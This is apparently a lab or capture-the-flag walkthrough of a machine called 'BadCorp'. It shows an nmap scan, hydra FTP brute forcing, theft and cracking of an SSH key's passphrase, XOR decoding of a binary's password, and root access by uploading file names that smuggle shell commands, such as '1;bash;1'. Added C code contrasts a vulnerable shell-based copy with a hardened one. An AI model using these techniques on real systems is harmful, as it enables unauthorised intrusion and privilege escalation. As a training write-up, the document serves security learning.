Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 05:48 EDT
Nmap scan report for 192.168.210.133
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: BadCorp| Html5 Agency template
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP (80)
We browse the site and find nothing really interesting. We did find an e-mail address, which leads us to a domain name: badcorp.lo. We added it to /etc/hosts and then enumerated subdomains and directories, without results.
The only page that gives us some information is about.html: we get names and phone numbers.
We collect these names to build a username list, then try brute-forcing with hydra.
Same principle with the other users.
Bingo!
Initial access
We need a passphrase.
Privilege escalation
We look for the password. With the strings command we find nothing interesting, so we download the file to our machine.
Reverse
We loaded the program, added an argument, and disassembled two functions: main and check. Here check is the one of interest: we need to know what values the registers hold before the call to strcmp.
We set a breakpoint at address 0x000055555555554d (call 0x555555555090 strcmp@plt).
We look at what the rsi register contains (it appears two lines above, under the variable name "pw").
The password seems encoded. One line in the code disassembled earlier is of interest: xor $0xc,%eax. The XOR key is 0xc.
We can decode the password.
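Added example, not part of the original writeup: the single-byte XOR round trip in C with the key 0xc from the disassembly, applied to the plaintext p4ssw0r6 that the writeup later uses on the victim; the stored (encoded) bytes are reconstructed from those two values, not copied from the binary. A small strings(1) emulation then shows why such obfuscation still leaks: the last four encoded bytes are printable, and the fragment {<~: matches what appears just before GCC: in the strings output of the backup binary shown further down the page, while the two 's' bytes become 0x7f (DEL) and cut the run short. Function names are mine.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define XOR_KEY 0x0c        /* from the disassembly: xor $0xc,%eax */
#define STRINGS_MIN_RUN 4   /* default minimum run length of strings(1) */

/* Single-byte XOR is its own inverse: one routine both encodes the
   plaintext into what the binary stores and decodes it back. */
size_t xor_with_key(const unsigned char *in, size_t n, unsigned char *out) {
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ XOR_KEY;
    out[n] = '\0';
    return n;
}

/* Emulate strings(1): copy the longest run of printable bytes that is at
   least STRINGS_MIN_RUN long into out (empty string if there is none). */
void longest_printable_run(const unsigned char *buf, size_t n, char *out, size_t cap) {
    size_t best_start = 0, best_len = 0, start = 0, len = 0;
    for (size_t i = 0; i <= n; i++) {
        if (i < n && isprint(buf[i])) {
            if (len == 0) start = i;
            len++;
        } else {
            if (len >= STRINGS_MIN_RUN && len > best_len) { best_start = start; best_len = len; }
            len = 0;
        }
    }
    if (best_len >= cap) best_len = cap - 1;
    memcpy(out, buf + best_start, best_len);
    out[best_len] = '\0';
}

int main(void) {
    unsigned char enc[64], dec[64];
    char run[64];
    /* Constructed: the stored form, rebuilt from the known plaintext. */
    size_t n = xor_with_key((const unsigned char *)"p4ssw0r6", 8, enc);
    xor_with_key(enc, n, dec);                       /* what rsi holds before strcmp */
    longest_printable_run(enc, n, run, sizeof run);
    printf("decoded: %s\n", (char *)dec);            /* p4ssw0r6 */
    printf("visible to strings: %s\n", run);         /* {<~: because 's'^0xc is 0x7f (DEL) */
    return 0;
}
```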
Back to the binary on the victim
With the strings command we can see what the program does.
The binary copies the files present in the FTP folder into /var/logs/hoswald/; we check whether we can inject commands by uploading files via FTP.
root!
All we have to do is upload: "1;bash;1"
We can also upload, for example: $(whoami)
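Added example, not code from the writeup or from the backup binary itself: the fragile pattern that the "/bin/cp -rf %s%s %s" string and the "sh:" error lines suggest, a cp command line built from the uploaded file name and handed to a shell, next to a hardened version that validates the name against an allow-list and runs /bin/cp through execv so the name is always one argument. Paths and user name are taken from the page; function names and the allow-list are mine.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fragile pattern: the file name is spliced into a command line that sh -c
   then parses, so a name such as "1;bash;1" or "$(whoami)" runs as extra
   commands with whatever privileges the program has (root on this box). */
int copy_via_shell(const char *user, const char *name) {
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "/bin/cp -rf /home/FTP/%s/%s /var/logs/%s/", user, name, user);
    return system(cmd);               /* never reached with untrusted names below */
}

/* Allow-list check for an untrusted file name: non-empty, no leading '.',
   only [A-Za-z0-9._-]. Returns 1 if acceptable, 0 otherwise. */
int safe_name(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 255 || name[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened copy: validate, then exec /bin/cp directly with an argv array.
   No shell is involved, so ';' '$(' '|' in the name have no meaning, and
   "--" keeps cp from reading a name that starts with '-' as an option.
   Returns cp's exit status, or -1 on rejection or failure. */
int copy_via_execv(const char *user, const char *name) {
    char src[512], dst[512];
    if (!safe_name(user) || !safe_name(name))
        return -1;
    snprintf(src, sizeof src, "/home/FTP/%s/%s", user, name);
    snprintf(dst, sizeof dst, "/var/logs/%s/", user);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/cp", "-rf", "--", src, dst, NULL };
        execv(argv[0], argv);
        _exit(127);                   /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```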
┌──(kali㉿kali)-[~/oscp]
└─$ hydra -L user3.txt -P pass3.txt ftp://badcorp.lo
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-19 06:48:57
[DATA] max 16 tasks per 1 server, overall 16 tasks, 33 login tries (l:11/p:3), ~3 tries per task
[DATA] attacking ftp://badcorp.lo:21/
[21][ftp] host: badcorp.lo login: hoswald password: 34566550
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-19 06:49:13
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.210.133
Connected to 192.168.210.133.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 06:49. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.210.133:kali): hoswald
331 User hoswald OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Extended Passive mode OK (|||32235|)
150 Accepted data connection
-rwxrwxr-- 1 0 0 1766 Feb 24 2021 id_rsa
226-Options: -l
226 1 matches total
ftp> mget id_rsa
mget id_rsa [anpqy?]?
229 Extended Passive mode OK (|||61027|)
150 Accepted data connection
100% |***************| 1766 1.21 MiB/s 00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 3.15 Mbytes per second
1766 bytes received in 00:00 (587.80 KiB/s)
ftp> exit
221-Goodbye. You uploaded 0 and downloaded 2 kbytes.
221 Logout.
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh oswald@badcorp.lo -i id_rsa
The authenticity of host 'badcorp.lo (192.168.210.133)' can't be established.
ED25519 key fingerprint is SHA256:mqPCrimr9j626KOGoHM+qxgHUOYD4pu1+4KzhIvu5uA.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
~/.ssh/known_hosts:10: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'badcorp.lo' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
┌──(kali㉿kali)-[~/oscp]
└─$ ssh2john id_rsa > hash.txt
┌──(kali㉿kali)-[~/oscp]
└─$ john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
developer (id_rsa)
1g 0:00:00:00 DONE (2024-08-19 08:45) 25.00g/s 3754Kp/s 3754Kc/s 3754KC/s dick13..dester
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~]
└─$ ssh hoswald@192.168.210.133 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux badcorp 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=1000(hoswald) gid=1000(hoswald) groups=1000(hoswald)
hoswald@badcorp:/var/logs/hoswald$ strings /usr/local/bin/backup
/lib64/ld-linux-x86-64.so.2
{...}
u/UH
[]A\A]A^A_
Bad character found !
/var/logs/%s/
/home/FTP/%s/
Could not open current directory
Create destination directory
/bin/mkdir -p /var/logs/%s/
FOLDER
%s %s
/bin/cp -rf %s%s %s
FILE
ALL FILE COPYED IN %s
Wrong Password !!!
USAGE: backup <password>
;*3$"
{<~:GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
{...}
hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6
Create destination directory
FILE id_rsa
ALL FILE COPYED IN /var/logs/hoswald/
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami"
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami;"
┌──(kali㉿kali)-[~]
└─$ touch "test;whoami;id"
{...}
ftp> put test;whoami;id
local: test;whoami;id remote: test;whoami;id
229 Extended Passive mode OK (|||8383|)
150 Accepted data connection
0 0.00 KiB/s
226 File successfully transferred
ftp> dir
229 Extended Passive mode OK (|||29312|)
150 Accepted data connection
-rwxrwxr-- 1 0 0 1766 Feb 24 2021 id_rsa
-rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:21 test;whoami
-rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:21 test;whoami;
-rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:23 test;whoami;id
hoswald@badcorp:/var/logs/hoswald$ /usr/local/bin/backup p4ssw0r6
FILE shell.php
FILE test;whoami;
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
root
sh: 1: /var/logs/hoswald/: Permission denied
FILE id_rsa
FILE test;whoami
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
whoami: extra operand ‘/var/logs/hoswald/’
Try 'whoami --help' for more information.
FILE reverse.elf
FILE test;whoami;id
/bin/cp: missing destination file operand after '/home/FTP/hoswald/test'
Try '/bin/cp --help' for more information.
root
id: ‘/var/logs/hoswald/’: no such user
ALL FILE COPYED IN /var/logs/hoswald/
hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6
FILE 1;bash;1
/bin/cp: missing destination file operand after '/home/FTP/hoswald/1'
Try '/bin/cp --help' for more information.
root@badcorp:~# whoami
root